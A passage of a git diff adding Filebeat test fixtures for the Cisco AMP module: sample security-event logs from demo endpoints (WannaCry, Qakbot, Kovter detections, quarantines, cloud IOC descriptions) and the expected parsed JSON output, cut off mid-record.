Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json new file mode 100644 index 000000000000..b1d52f25c8a8 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json 
@@ -0,0 +1,2349 @@ +[ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835279", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 459000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 1186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204901661835278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 443000000, + "event.action": "Threat Detected", + 
"event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2465, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3738, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204897366867979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 6000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5108, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867971", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 6470, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117251", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 7590, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 8772, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Gen.20fu.1201", + "cisco.amp.detection_id": "6411456342573187074", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 589000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + 
"event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11257, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411456342573187073", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 558000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "AySxs.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", 
+ "input.type": "log", + "log.offset": 12514, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:42.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 692000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1492784107692000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T12:27:42.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": 